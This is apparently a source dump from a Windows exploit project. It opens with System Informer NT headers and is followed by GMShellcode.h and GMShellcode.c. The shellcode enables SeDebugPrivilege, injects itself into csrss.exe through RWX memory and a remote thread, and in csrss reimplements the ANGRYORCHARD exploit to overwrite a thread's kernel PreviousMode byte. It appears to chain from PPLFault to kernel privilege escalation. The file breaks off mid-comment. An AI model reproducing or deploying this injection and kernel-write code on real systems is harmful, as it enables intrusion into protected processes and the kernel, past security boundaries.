ComputeServer, 287 | WHServer, 288 | PhoneNT, 289 | MaxSuiteType 290 | } SUITE_TYPE; 291 | 292 | // Specific 293 | 294 | typedef struct _CLIENT_ID 295 | { 296 | HANDLE UniqueProcess; 297 | HANDLE UniqueThread; 298 | } CLIENT_ID, *PCLIENT_ID; 299 | 300 | typedef struct _CLIENT_ID32 301 | { 302 | ULONG UniqueProcess; 303 | ULONG UniqueThread; 304 | } CLIENT_ID32, *PCLIENT_ID32; 305 | 306 | typedef struct _CLIENT_ID64 307 | { 308 | ULONGLONG UniqueProcess; 309 | ULONGLONG UniqueThread; 310 | } CLIENT_ID64, *PCLIENT_ID64; 311 | 
312 | #include 313 | 314 | typedef struct _KSYSTEM_TIME 315 | { 316 | ULONG LowPart; 317 | LONG High1Time; 318 | LONG High2Time; 319 | } KSYSTEM_TIME, *PKSYSTEM_TIME; 320 | 321 | #include 322 | 323 | // NT macros used to test, set and clear flags 324 | #ifndef FlagOn 325 | #define FlagOn(_F, _SF) ((_F) & (_SF)) 326 | #endif 327 | #ifndef BooleanFlagOn 328 | #define BooleanFlagOn(F, SF) ((BOOLEAN)(((F) & (SF)) != 0)) 329 | #endif 330 | #ifndef SetFlag 331 | #define SetFlag(_F, _SF) ((_F) |= (_SF)) 332 | #endif 333 | #ifndef ClearFlag 334 | #define ClearFlag(_F, _SF) ((_F) &= ~(_SF)) 335 | #endif 336 | 337 | #endif 338 | 339 | #endif 340 | -------------------------------------------------------------------------------- /phnt/include/ntpfapi.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Prefetcher (Superfetch) support functions 3 | * 4 | * This file is part of System Informer. 5 | */ 6 | 7 | #ifndef _NTPFAPI_H 8 | #define _NTPFAPI_H 9 | 10 | // begin_private 11 | 12 | // Prefetch 13 | 14 | typedef enum _PF_BOOT_PHASE_ID 15 | { 16 | PfKernelInitPhase = 0, 17 | PfBootDriverInitPhase = 90, 18 | PfSystemDriverInitPhase = 120, 19 | PfSessionManagerInitPhase = 150, 20 | PfSMRegistryInitPhase = 180, 21 | PfVideoInitPhase = 210, 22 | PfPostVideoInitPhase = 240, 23 | PfBootAcceptedRegistryInitPhase = 270, 24 | PfUserShellReadyPhase = 300, 25 | PfMaxBootPhaseId = 900 26 | } PF_BOOT_PHASE_ID; 27 | 28 | typedef enum _PF_ENABLE_STATUS 29 | { 30 | PfSvNotSpecified, 31 | PfSvEnabled, 32 | PfSvDisabled, 33 | PfSvMaxEnableStatus 34 | } PF_ENABLE_STATUS; 35 | 36 | typedef struct _PF_TRACE_LIMITS 37 | { 38 | ULONG MaxNumPages; 39 | ULONG MaxNumSections; 40 | LONGLONG TimerPeriod; 41 | } PF_TRACE_LIMITS, *PPF_TRACE_LIMITS; 42 | 43 | typedef struct _PF_SYSTEM_PREFETCH_PARAMETERS 44 | { 45 | PF_ENABLE_STATUS EnableStatus[2]; 46 | PF_TRACE_LIMITS TraceLimits[2]; 47 | ULONG MaxNumActiveTraces; 48 | ULONG MaxNumSavedTraces; 49 | WCHAR 
RootDirPath[32]; 50 | WCHAR HostingApplicationList[128]; 51 | } PF_SYSTEM_PREFETCH_PARAMETERS, *PPF_SYSTEM_PREFETCH_PARAMETERS; 52 | 53 | #define PF_BOOT_CONTROL_VERSION 1 54 | 55 | typedef struct _PF_BOOT_CONTROL 56 | { 57 | ULONG Version; 58 | ULONG DisableBootPrefetching; 59 | } PF_BOOT_CONTROL, *PPF_BOOT_CONTROL; 60 | 61 | typedef enum _PREFETCHER_INFORMATION_CLASS 62 | { 63 | PrefetcherRetrieveTrace = 1, // q: CHAR[] 64 | PrefetcherSystemParameters, // q: PF_SYSTEM_PREFETCH_PARAMETERS 65 | PrefetcherBootPhase, // s: PF_BOOT_PHASE_ID 66 | PrefetcherSpare1, // PrefetcherRetrieveBootLoaderTrace // q: CHAR[] 67 | PrefetcherBootControl, // s: PF_BOOT_CONTROL 68 | PrefetcherScenarioPolicyControl, 69 | PrefetcherSpare2, 70 | PrefetcherAppLaunchScenarioControl, 71 | PrefetcherInformationMax 72 | } PREFETCHER_INFORMATION_CLASS; 73 | 74 | #define PREFETCHER_INFORMATION_VERSION 23 // rev 75 | #define PREFETCHER_INFORMATION_MAGIC ('kuhC') // rev 76 | 77 | typedef struct _PREFETCHER_INFORMATION 78 | { 79 | _In_ ULONG Version; 80 | _In_ ULONG Magic; 81 | _In_ PREFETCHER_INFORMATION_CLASS PrefetcherInformationClass; 82 | _Inout_ PVOID PrefetcherInformation; 83 | _Inout_ ULONG PrefetcherInformationLength; 84 | } PREFETCHER_INFORMATION, *PPREFETCHER_INFORMATION; 85 | 86 | // Superfetch 87 | 88 | typedef struct _PF_SYSTEM_SUPERFETCH_PARAMETERS 89 | { 90 | ULONG EnabledComponents; 91 | ULONG BootID; 92 | ULONG SavedSectInfoTracesMax; 93 | ULONG SavedPageAccessTracesMax; 94 | ULONG ScenarioPrefetchTimeoutStandby; 95 | ULONG ScenarioPrefetchTimeoutHibernate; 96 | ULONG ScenarioPrefetchTimeoutHiberBoot; 97 | } PF_SYSTEM_SUPERFETCH_PARAMETERS, *PPF_SYSTEM_SUPERFETCH_PARAMETERS; 98 | 99 | #define PF_PFN_PRIO_REQUEST_VERSION 1 100 | #define PF_PFN_PRIO_REQUEST_QUERY_MEMORY_LIST 0x1 101 | #define PF_PFN_PRIO_REQUEST_VALID_FLAGS 0x1 102 | 103 | typedef struct _PF_PFN_PRIO_REQUEST 104 | { 105 | ULONG Version; 106 | ULONG RequestFlags; 107 | ULONG_PTR PfnCount; 108 | 
SYSTEM_MEMORY_LIST_INFORMATION MemInfo; 109 | MMPFN_IDENTITY PageData[256]; 110 | } PF_PFN_PRIO_REQUEST, *PPF_PFN_PRIO_REQUEST; 111 | 112 | typedef enum _PFS_PRIVATE_PAGE_SOURCE_TYPE 113 | { 114 | PfsPrivateSourceKernel, 115 | PfsPrivateSourceSession, 116 | PfsPrivateSourceProcess, 117 | PfsPrivateSourceMax 118 | } PFS_PRIVATE_PAGE_SOURCE_TYPE; 119 | 120 | typedef struct _PFS_PRIVATE_PAGE_SOURCE 121 | { 122 | PFS_PRIVATE_PAGE_SOURCE_TYPE Type; 123 | union 124 | { 125 | ULONG SessionId; 126 | ULONG ProcessId; 127 | }; 128 | ULONG ImagePathHash; 129 | ULONG_PTR UniqueProcessHash; 130 | } PFS_PRIVATE_PAGE_SOURCE, *PPFS_PRIVATE_PAGE_SOURCE; 131 | 132 | typedef struct _PF_PRIVSOURCE_INFO 133 | { 134 | PFS_PRIVATE_PAGE_SOURCE DbInfo; 135 | PVOID EProcess; 136 | SIZE_T WsPrivatePages; 137 | SIZE_T TotalPrivatePages; 138 | ULONG SessionID; 139 | CHAR ImageName[16]; 140 | union { 141 | ULONG_PTR WsSwapPages; // process only PF_PRIVSOURCE_QUERY_WS_SWAP_PAGES. 142 | ULONG_PTR SessionPagedPoolPages; // session only. 143 | ULONG_PTR StoreSizePages; // process only PF_PRIVSOURCE_QUERY_STORE_INFO. 144 | }; 145 | ULONG_PTR WsTotalPages; // process/session only. 146 | ULONG DeepFreezeTimeMs; // process only. 147 | ULONG ModernApp : 1; // process only. 148 | ULONG DeepFrozen : 1; // process only. If set, DeepFreezeTimeMs contains the time at which the freeze occurred 149 | ULONG Foreground : 1; // process only. 150 | ULONG PerProcessStore : 1; // process only. 
151 | ULONG Spare : 28; 152 | } PF_PRIVSOURCE_INFO, *PPF_PRIVSOURCE_INFO; 153 | 154 | #define PF_PRIVSOURCE_QUERY_REQUEST_VERSION 8 155 | 156 | typedef struct _PF_PRIVSOURCE_QUERY_REQUEST 157 | { 158 | ULONG Version; 159 | ULONG Flags; 160 | ULONG InfoCount; 161 | PF_PRIVSOURCE_INFO InfoArray[1]; 162 | } PF_PRIVSOURCE_QUERY_REQUEST, *PPF_PRIVSOURCE_QUERY_REQUEST; 163 | 164 | typedef enum _PF_PHASED_SCENARIO_TYPE 165 | { 166 | PfScenarioTypeNone, 167 | PfScenarioTypeStandby, 168 | PfScenarioTypeHibernate, 169 | PfScenarioTypeFUS, 170 | PfScenarioTypeMax 171 | } PF_PHASED_SCENARIO_TYPE; 172 | 173 | #define PF_SCENARIO_PHASE_INFO_VERSION 4 174 | 175 | typedef struct _PF_SCENARIO_PHASE_INFO 176 | { 177 | ULONG Version; 178 | PF_PHASED_SCENARIO_TYPE ScenType; 179 | ULONG PhaseId; 180 | ULONG SequenceNumber; 181 | ULONG Flags; 182 | ULONG FUSUserId; 183 | } PF_SCENARIO_PHASE_INFO, *PPF_SCENARIO_PHASE_INFO; 184 | 185 | typedef struct _PF_MEMORY_LIST_NODE 186 | { 187 | ULONGLONG Node : 8; 188 | ULONGLONG Spare : 56; 189 | ULONGLONG StandbyLowPageCount; 190 | ULONGLONG StandbyMediumPageCount; 191 | ULONGLONG StandbyHighPageCount; 192 | ULONGLONG FreePageCount; 193 | ULONGLONG ModifiedPageCount; 194 | } PF_MEMORY_LIST_NODE, *PPF_MEMORY_LIST_NODE; 195 | 196 | #define PF_MEMORY_LIST_INFO_VERSION 1 197 | 198 | typedef struct _PF_MEMORY_LIST_INFO 199 | { 200 | ULONG Version; 201 | ULONG Size; 202 | ULONG NodeCount; 203 | PF_MEMORY_LIST_NODE Nodes[1]; 204 | } PF_MEMORY_LIST_INFO, *PPF_MEMORY_LIST_INFO; 205 | 206 | typedef struct _PF_PHYSICAL_MEMORY_RANGE 207 | { 208 | ULONG_PTR BasePfn; 209 | ULONG_PTR PageCount; 210 | } PF_PHYSICAL_MEMORY_RANGE, *PPF_PHYSICAL_MEMORY_RANGE; 211 | 212 | #define PF_PHYSICAL_MEMORY_RANGE_INFO_V1_VERSION 1 213 | 214 | typedef struct _PF_PHYSICAL_MEMORY_RANGE_INFO_V1 215 | { 216 | ULONG Version; 217 | ULONG RangeCount; 218 | PF_PHYSICAL_MEMORY_RANGE Ranges[1]; 219 | } PF_PHYSICAL_MEMORY_RANGE_INFO_V1, *PPF_PHYSICAL_MEMORY_RANGE_INFO_V1; 220 | 221 | 
#define PF_PHYSICAL_MEMORY_RANGE_INFO_V2_VERSION 2 222 | 223 | typedef struct _PF_PHYSICAL_MEMORY_RANGE_INFO_V2 224 | { 225 | ULONG Version; 226 | ULONG Flags; 227 | ULONG RangeCount; 228 | PF_PHYSICAL_MEMORY_RANGE Ranges[ANYSIZE_ARRAY]; 229 | } PF_PHYSICAL_MEMORY_RANGE_INFO_V2, *PPF_PHYSICAL_MEMORY_RANGE_INFO_V2; 230 | 231 | // begin_rev 232 | 233 | #define PF_REPURPOSED_BY_PREFETCH_INFO_VERSION 1 234 | 235 | typedef struct _PF_REPURPOSED_BY_PREFETCH_INFO 236 | { 237 | ULONG Version; 238 | ULONG RepurposedByPrefetch; 239 | } PF_REPURPOSED_BY_PREFETCH_INFO, *PPF_REPURPOSED_BY_PREFETCH_INFO; 240 | 241 | // end_rev 242 | 243 | typedef enum _SUPERFETCH_INFORMATION_CLASS 244 | { 245 | SuperfetchRetrieveTrace = 1, // q: CHAR[] 246 | SuperfetchSystemParameters, // q: PF_SYSTEM_SUPERFETCH_PARAMETERS 247 | SuperfetchLogEvent, 248 | SuperfetchGenerateTrace, 249 | SuperfetchPrefetch, 250 | SuperfetchPfnQuery, // q: PF_PFN_PRIO_REQUEST 251 | SuperfetchPfnSetPriority, 252 | SuperfetchPrivSourceQuery, // q: PF_PRIVSOURCE_QUERY_REQUEST 253 | SuperfetchSequenceNumberQuery, // q: ULONG 254 | SuperfetchScenarioPhase, // 10 255 | SuperfetchWorkerPriority, 256 | SuperfetchScenarioQuery, // q: PF_SCENARIO_PHASE_INFO 257 | SuperfetchScenarioPrefetch, 258 | SuperfetchRobustnessControl, 259 | SuperfetchTimeControl, 260 | SuperfetchMemoryListQuery, // q: PF_MEMORY_LIST_INFO 261 | SuperfetchMemoryRangesQuery, // q: PF_PHYSICAL_MEMORY_RANGE_INFO 262 | SuperfetchTracingControl, 263 | SuperfetchTrimWhileAgingControl, 264 | SuperfetchRepurposedByPrefetch, // q: PF_REPURPOSED_BY_PREFETCH_INFO // rev 265 | SuperfetchChannelPowerRequest, 266 | SuperfetchMovePages, 267 | SuperfetchVirtualQuery, 268 | SuperfetchCombineStatsQuery, 269 | SuperfetchSetMinWsAgeRate, 270 | SuperfetchDeprioritizeOldPagesInWs, 271 | SuperfetchFileExtentsQuery, 272 | SuperfetchGpuUtilizationQuery, // PF_GPU_UTILIZATION_INFO 273 | SuperfetchInformationMax 274 | } SUPERFETCH_INFORMATION_CLASS; 275 | 276 | #define 
SUPERFETCH_INFORMATION_VERSION 45 // rev 277 | #define SUPERFETCH_INFORMATION_MAGIC ('kuhC') // rev 278 | 279 | typedef struct _SUPERFETCH_INFORMATION 280 | { 281 | _In_ ULONG Version; 282 | _In_ ULONG Magic; 283 | _In_ SUPERFETCH_INFORMATION_CLASS SuperfetchInformationClass; 284 | _Inout_ PVOID SuperfetchInformation; 285 | _Inout_ ULONG SuperfetchInformationLength; 286 | } SUPERFETCH_INFORMATION, *PSUPERFETCH_INFORMATION; 287 | 288 | // end_private 289 | 290 | #endif 291 | -------------------------------------------------------------------------------- /GMShellcode/GMShellcode.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | 11 | typedef NTSTATUS (NTAPI * RtlAdjustPrivilege_t)( 12 | DWORD privilege, 13 | BOOL bEnablePrivilege, 14 | BOOL IsThreadPrivilege, 15 | PBOOLEAN PreviousValue); 16 | 17 | typedef HMODULE(WINAPI* LoadLibraryW_t)( 18 | LPCWSTR lpLibFileName 19 | ); 20 | 21 | typedef FARPROC(WINAPI* GetProcAddress_t)( 22 | HMODULE hModule, 23 | LPCSTR lpProcName 24 | ); 25 | 26 | typedef HANDLE(WINAPI* OpenProcess_t)( 27 | DWORD dwDesiredAccess, 28 | BOOL bInheritHandle, 29 | DWORD dwProcessId 30 | ); 31 | 32 | typedef NTSTATUS (NTAPI * NtOpenProcess_t)( 33 | PHANDLE ProcessHandle, 34 | ACCESS_MASK DesiredAccess, 35 | POBJECT_ATTRIBUTES ObjectAttributes, 36 | PCLIENT_ID ClientId 37 | ); 38 | 39 | typedef NTSTATUS (NTAPI *NtOpenThread_t)( 40 | _Out_ PHANDLE ThreadHandle, 41 | _In_ ACCESS_MASK DesiredAccess, 42 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 43 | _In_opt_ PCLIENT_ID ClientId 44 | ); 45 | 46 | 47 | typedef HANDLE(WINAPI* CreateFileW_t)( 48 | LPCWSTR lpFileName, 49 | DWORD dwDesiredAccess, 50 | DWORD dwShareMode, 51 | LPSECURITY_ATTRIBUTES lpSecurityAttributes, 52 | DWORD dwCreationDisposition, 53 | DWORD dwFlagsAndAttributes, 54 | HANDLE hTemplateFile 55 | ); 56 | 57 | typedef BOOL (WINAPI 
*ReadFile_t)( 58 | HANDLE hFile, 59 | LPVOID lpBuffer, 60 | DWORD nNumberOfBytesToRead, 61 | LPDWORD lpNumberOfBytesRead, 62 | LPOVERLAPPED lpOverlapped 63 | ); 64 | 65 | typedef BOOL(WINAPI* TerminateProcess_t)( 66 | HANDLE hProcess, 67 | UINT uExitCode 68 | ); 69 | 70 | typedef NTSTATUS (NTAPI *NtTerminateProcess_t)( 71 | HANDLE ProcessHandle, 72 | NTSTATUS ExitStatus 73 | ); 74 | 75 | typedef NTSTATUS (NTAPI *NtTerminateThread_t)( 76 | IN HANDLE ThreadHandle, 77 | IN NTSTATUS ExitStatus); 78 | 79 | 80 | typedef LPVOID (WINAPI* VirtualAllocEx_t)( 81 | HANDLE hProcess, 82 | LPVOID lpAddress, 83 | SIZE_T dwSize, 84 | DWORD flAllocationType, 85 | DWORD flProtect 86 | ); 87 | 88 | typedef NTSTATUS (NTAPI * NtAllocateVirtualMemory_t)( 89 | HANDLE ProcessHandle, 90 | PVOID* BaseAddress, 91 | ULONG_PTR ZeroBits, 92 | PSIZE_T RegionSize, 93 | ULONG AllocationType, 94 | ULONG Protect 95 | ); 96 | 97 | typedef BOOL (WINAPI *WriteProcessMemory_t)( 98 | HANDLE hProcess, 99 | LPVOID lpBaseAddress, 100 | LPCVOID lpBuffer, 101 | SIZE_T nSize, 102 | SIZE_T* lpNumberOfBytesWritten 103 | ); 104 | 105 | typedef NTSTATUS (NTAPI *NtWriteVirtualMemory_t)( 106 | IN HANDLE ProcessHandle, 107 | IN PVOID BaseAddress, 108 | IN PVOID Buffer, 109 | IN ULONG NumberOfBytesToWrite, 110 | OUT PULONG NumberOfBytesWritten); 111 | 112 | typedef HANDLE (WINAPI * CreateRemoteThread_t)( 113 | HANDLE hProcess, 114 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 115 | SIZE_T dwStackSize, 116 | LPTHREAD_START_ROUTINE lpStartAddress, 117 | LPVOID lpParameter, 118 | DWORD dwCreationFlags, 119 | LPDWORD lpThreadId 120 | ); 121 | 122 | typedef NTSTATUS (NTAPI *RtlCreateUserThread_t)( 123 | IN HANDLE ProcessHandle, 124 | IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL, 125 | IN BOOLEAN CreateSuspended, 126 | IN ULONG StackZeroBits, 127 | IN OUT PULONG StackReserved, 128 | IN OUT PULONG StackCommit, 129 | IN PVOID StartAddress, 130 | IN PVOID StartParameter OPTIONAL, 131 | OUT PHANDLE ThreadHandle, 132 | OUT 
CLIENT_ID *ClientID); 133 | 134 | typedef BOOL(WINAPI* MiniDumpWriteDump_t)( 135 | HANDLE hProcess, 136 | DWORD ProcessId, 137 | HANDLE hFile, 138 | MINIDUMP_TYPE DumpType, 139 | PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam, 140 | PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam, 141 | PMINIDUMP_CALLBACK_INFORMATION CallbackParam 142 | ); 143 | 144 | typedef NTSTATUS (NTAPI * NtWaitForSingleObject_t)( 145 | HANDLE Handle, 146 | BOOLEAN Alertable, 147 | PLARGE_INTEGER Timeout 148 | ); 149 | 150 | typedef NTSTATUS (NTAPI * NtCreateEvent_t)( 151 | PHANDLE EventHandle, 152 | ACCESS_MASK DesiredAccess, 153 | POBJECT_ATTRIBUTES ObjectAttributes, 154 | EVENT_TYPE EventType, 155 | BOOLEAN InitialState 156 | ); 157 | 158 | typedef NTSTATUS (NTAPI *NtSetEvent_t)( 159 | HANDLE EventHandle, 160 | PLONG PreviousState 161 | ); 162 | 163 | typedef NTSTATUS (NTAPI *NtCreateMutant_t)( 164 | OUT PHANDLE MutantHandle, 165 | IN ACCESS_MASK DesiredAccess, 166 | IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, 167 | IN BOOLEAN InitialOwner); 168 | 169 | typedef NTSTATUS (NTAPI * NtCreateSection_t)( 170 | PHANDLE SectionHandle, 171 | ACCESS_MASK DesiredAccess, 172 | POBJECT_ATTRIBUTES ObjectAttributes, 173 | PLARGE_INTEGER MaximumSize, 174 | ULONG SectionPageProtection, 175 | ULONG AllocationAttributes, 176 | HANDLE FileHandle 177 | ); 178 | 179 | typedef NTSTATUS (NTAPI * NtMapViewOfSection_t)( 180 | HANDLE SectionHandle, 181 | HANDLE ProcessHandle, 182 | PVOID* BaseAddress, 183 | ULONG_PTR ZeroBits, 184 | SIZE_T CommitSize, 185 | PLARGE_INTEGER SectionOffset, 186 | PSIZE_T ViewSize, 187 | SECTION_INHERIT InheritDisposition, 188 | ULONG AllocationType, 189 | ULONG Win32Protect 190 | ); 191 | 192 | typedef ULONG (NTAPI *CsrGetProcessId_t)(); 193 | 194 | typedef enum 195 | { 196 | UserThreadShutdownInformation, 197 | UserThreadFlags, 198 | UserThreadTaskName, 199 | UserThreadWOWInformation, 200 | UserThreadHungStatus, 201 | UserThreadInitiateShutdown, 202 | UserThreadEndShutdown, 203 | 
UserThreadUseDesktop, 204 | UserThreadPolled, 205 | UserThreadKeyboardState, 206 | UserThreadCsrPort, 207 | UserThreadResyncKeyState, 208 | UserThreadUseActiveDesktop 209 | } USERTHREADINFOCLASS; 210 | 211 | typedef enum 212 | { 213 | HardErrorSetup, 214 | HardErrorCleanup, 215 | HardErrorAttach, 216 | HardErrorAttachUser, 217 | HardErrorDetach, 218 | HardErrorAttachNoQueue, 219 | HardErrorDetachNoQueue, 220 | HardErrorQuery, 221 | HardErrorInDefDesktop 222 | } HARDERRORCONTROL; 223 | 224 | typedef struct 225 | { 226 | HANDLE pDeskRestore; 227 | HANDLE pDeskNew; 228 | } DESKTOPRESTOREDATA, * PDESKTOPRESTOREDATA; 229 | 230 | typedef struct 231 | { 232 | HANDLE Thread; 233 | DESKTOPRESTOREDATA Restore; 234 | } DESKTOPUSEDESKTOP, * PDESKTOPUSEDESKTOP; 235 | 236 | typedef NTSTATUS (NTAPI *NtUserSetInformationThread_t)( 237 | _In_ HANDLE Thread, 238 | _In_ USERTHREADINFOCLASS ThreadInfoClass, 239 | _In_ PVOID ThreadInformation, 240 | _In_ ULONG ThreadInformationLength 241 | ); 242 | 243 | typedef NTSTATUS (NTAPI * NtUserHardErrorControl_t)( 244 | _In_ HARDERRORCONTROL Command, 245 | _In_ HANDLE Thread, 246 | _In_ PDESKTOPRESTOREDATA DesktopRestore 247 | ); 248 | 249 | #define MAGIC1 0x1BADC0D3 250 | #define MAGIC2 0xDEADBEEF 251 | 252 | // 90 nop 253 | // 48 87 c9 xchg rcx, rcx 254 | // 48 87 d2 xchg rdx, rdx 255 | // 4d 87 c0 xchg r8, r8 256 | // 4d 87 c9 xchg r9, r9 257 | // 90 nop 258 | #define MAGIC_NOPS { 0x90, 0x48, 0x87, 0xC9, 0x48, 0x87, 0xD2, 0x4D, 0x87, 0xC0, 0x4D, 0x87, 0xC9, 0x90 } 259 | #define MAGIC_NOPS_LENGTH 14 260 | 261 | #define ETHREAD_PREVIOUSMODE_OFFSET 0x232 262 | #define OBJECT_HEADER_SIZE 0x30 263 | 264 | #define BNO L"\\BaseNamedObjects\\" 265 | #define GLOBAL L"Global\\" 266 | #define MUTEX_NAME_BASE L"GMMut" 267 | #define REQ_NAME_BASE L"GMReq" 268 | #define DONE_NAME_BASE L"GMDone" 269 | #define SECTION_NAME_BASE L"GMSec" 270 | 271 | typedef struct _IPC_SECTION 272 | { 273 | volatile PVOID pThread; 274 | volatile NTSTATUS ntStatus; 275 | } 
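IPC_SECTION, *PIPC_SECTION;

// Parameter block the loader appends to the raw shellcode bytes. The shellcode
// finds it at run time by scanning forward from its own code for magic1/magic2
// (see GetParams), so the layout below is an ABI shared with whatever builds the
// blob: do not reorder or resize fields without updating that side too.
typedef struct _SHELLCODE_PARAMS
{
    DWORD magic1;                       // MAGIC1: first half of the marker GetParams scans for
    DWORD magic2;                       // MAGIC2: second half of the marker

    // Size in bytes of the whole blob, measured from the MAGIC_NOPS base. It must
    // reach past this structure, because the copy planted in csrss locates its own
    // parameters with the same forward scan and ServicesShellcode copies exactly
    // mySize bytes.
    DWORD mySize;
    UCHAR magicNops[MAGIC_NOPS_LENGTH]; // byte pattern FindMyBase searches backwards for; the
                                        // loader is assumed to place the same bytes at the blob base

    // Object names used for the csrss<->client IPC (see CsrssShellcode). Presumably
    // full \BaseNamedObjects\Global\ paths built from the *_NAME_BASE macros -- confirm
    // against the loader.
    WCHAR mutexName[60];
    WCHAR reqName[60];
    WCHAR doneName[60];
    WCHAR sectionName[60];

    // User params
    DWORD dwCsrssPid;                   // PID of csrss.exe; also selects which role Shellcode() runs

    // IAT: the blob has no imports, so every native call goes through these pointers.
    // NOTE(review): there is no NtClose here, so handles opened by the shellcode are never
    // released by it.
    NtOpenProcess_t pNtOpenProcess;
    NtTerminateProcess_t pNtTerminateProcess;
    RtlAdjustPrivilege_t pRtlAdjustPrivilege;
    NtAllocateVirtualMemory_t pNtAllocateVirtualMemory;
    NtWriteVirtualMemory_t pNtWriteVirtualMemory;
    RtlCreateUserThread_t pRtlCreateUserThread;
    NtWaitForSingleObject_t pNtWaitForSingleObject;
    NtCreateEvent_t pNtCreateEvent;
    NtSetEvent_t pNtSetEvent;
    NtCreateMutant_t pNtCreateMutant;
    NtCreateSection_t pNtCreateSection;
    NtMapViewOfSection_t pNtMapViewOfSection;

    NtUserSetInformationThread_t pNtUserSetInformationThread;
    NtUserHardErrorControl_t pNtUserHardErrorControl;

} SHELLCODE_PARAMS, * PSHELLCODE_PARAMS;

#ifdef __cplusplus
} // extern "C"
#endif
--------------------------------------------------------------------------------
/GMShellcode/GMShellcode.c:
--------------------------------------------------------------------------------
#define _CRT_SECURE_NO_WARNINGS

// NOTE(review): the header names on the following #include lines were lost in this
// rendering of the file; restore them from the repository before building.
#include 
#include 
#include 
#include 
#include 

#include "GMShellcode.h"

// Everything between Shellcode and EndShellcode is emitted as position-independent
// bytes: no CRT calls, no string literals, no globals. Optimization is disabled so
// the helpers below are not inlined or turned into library calls.
#pragma optimize("", off)

PSHELLCODE_PARAMS GetParams(VOID);
PVOID FindMyBase(PSHELLCODE_PARAMS pParams);
VOID ServicesShellcode(PSHELLCODE_PARAMS pParams);
VOID CsrssShellcode(PSHELLCODE_PARAMS pParams);
struct _TEB* CurrentTeb(VOID);
size_t _wcslen(const wchar_t* str);
VOID _RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);

// Overwrites DllMain (technically CRT DllMain)
//
// Entry point of the blob. The same bytes run in two processes: first in the
// process the loader hijacked (ServicesShellcode), then in csrss.exe after
// ServicesShellcode copies the blob there (CsrssShellcode). The role is chosen
// purely by comparing the current PID with pParams->dwCsrssPid; the DllMain
// arguments are not examined, so this runs whatever the attach reason is.
BOOL APIENTRY Shellcode(
    HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
    )
{
    PSHELLCODE_PARAMS pParams = GetParams();

    (void)hModule;
    (void)ul_reason_for_call;
    (void)lpReserved;

    if ((DWORD)(ULONG_PTR)CurrentTeb()->ClientId.UniqueProcess == pParams->dwCsrssPid)
    {
        CsrssShellcode(pParams);
    }
    else
    {
        ServicesShellcode(pParams);
    }

    return TRUE;
}

// First stage: runs inside the hijacked process (presumably the protected process
// launched by PPLFault -- confirm). Copies the whole blob into csrss.exe, starts a
// thread on it there, then terminates the current process.
//
// The `int x = N; __debugbreak();` pairs are the project's way of leaving an error
// code visible in a debugger. Without a debugger attached the breakpoint becomes an
// unhandled exception, so they are only useful while developing. Every failure now
// jumps straight to the terminate call instead of continuing with NULL handles.
VOID ServicesShellcode( PSHELLCODE_PARAMS pParams )
{
    NTSTATUS ntStatus = STATUS_SUCCESS;
    BOOLEAN ignored = 0;
    HANDLE hCsrss = NULL;
    PVOID pCsrssBuffer = NULL;
    SIZE_T regionSize = pParams->mySize;
    ULONG bytesWritten = 0;
    HANDLE hThread = NULL;
    OBJECT_ATTRIBUTES objAttr = { 0, };
    CLIENT_ID csrssCid = { (HANDLE)(ULONG_PTR)pParams->dwCsrssPid, NULL };
    PVOID pMyBase = FindMyBase(pParams);

    if (!pMyBase)
    {
        int x = 0;
        __debugbreak();
        goto done;
    }

    // Enable SeDebugPrivilege. As in the original, a failure here is reported but
    // the open below is still attempted.
    if (0 != pParams->pRtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &ignored))
    {
        int x = 1;
        __debugbreak();
    }

    // Open csrss with whatever access we are granted; the status is checked as
    // well as the handle so a failed open never reaches the allocation below.
    InitializeObjectAttributes(&objAttr, NULL, 0, NULL, NULL);
    ntStatus = pParams->pNtOpenProcess(&hCsrss, MAXIMUM_ALLOWED, &objAttr, &csrssCid);
    if (!NT_SUCCESS(ntStatus) || NULL == hCsrss)
    {
        int x = 2;
        __debugbreak();
        goto done;
    }

    // RWX private memory plus a remote thread in csrss; a well-known detection
    // signal, kept as-is since the design depends on executing the copied bytes.
    ntStatus = pParams->pNtAllocateVirtualMemory(hCsrss, &pCsrssBuffer, 0, &regionSize, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!NT_SUCCESS(ntStatus) || NULL == pCsrssBuffer)
    {
        int x = 3;
        __debugbreak();
        goto done;
    }

    ntStatus = pParams->pNtWriteVirtualMemory(hCsrss, pCsrssBuffer, pMyBase, pParams->mySize, &bytesWritten);
    if (!NT_SUCCESS(ntStatus) || bytesWritten != pParams->mySize)
    {
        int x = 4;
        __debugbreak();
        goto done;
    }

    // The new thread starts at the copied blob base, i.e. at the MAGIC_NOPS bytes;
    // what follows them is decided by the loader's layout of the blob.
    ntStatus = pParams->pRtlCreateUserThread(hCsrss, NULL, FALSE, 0, NULL, NULL, (PUCHAR)pCsrssBuffer, NULL, &hThread, NULL);
    if (!NT_SUCCESS(ntStatus))
    {
        int x = 5;
        __debugbreak();
        goto done;
    }

    // There is deliberately no wait on hThread: the csrss side services requests
    // forever, and this process exits immediately instead.

done:
    // Don't trigger WER: exit cleanly rather than by crashing. hCsrss is not closed
    // because the parameter block carries no NtClose pointer; the process exit
    // releases it.
    (void)pParams->pNtTerminateProcess(NtCurrentProcess(), 0);
}

// This is a reimplementation of ANGRYORCHARD's exploit
// https://github.com/SecIdiot/ANGRYORCHARD/blob/0a4720f7e07e86a9ac2783411b81efac14938e26/Exploit.c#L71-L77
//
// Second stage: runs as a thread inside csrss.exe. It publishes a mutex, two events
// and a shared section, then loops forever: each time the request event is signalled
// it takes the thread object address the client wrote into the section and uses the
// win32k UseDesktop/HardErrorDetachNoQueue pair to write at
// pThread + OBJECT_HEADER_SIZE + ETHREAD_PREVIOUSMODE_OFFSET, i.e. (per the constant
// names) the PreviousMode byte of that thread's ETHREAD.
//
// Security notes for anyone maintaining this:
//  - Both offsets are hard-coded for one kernel build and nothing here validates them;
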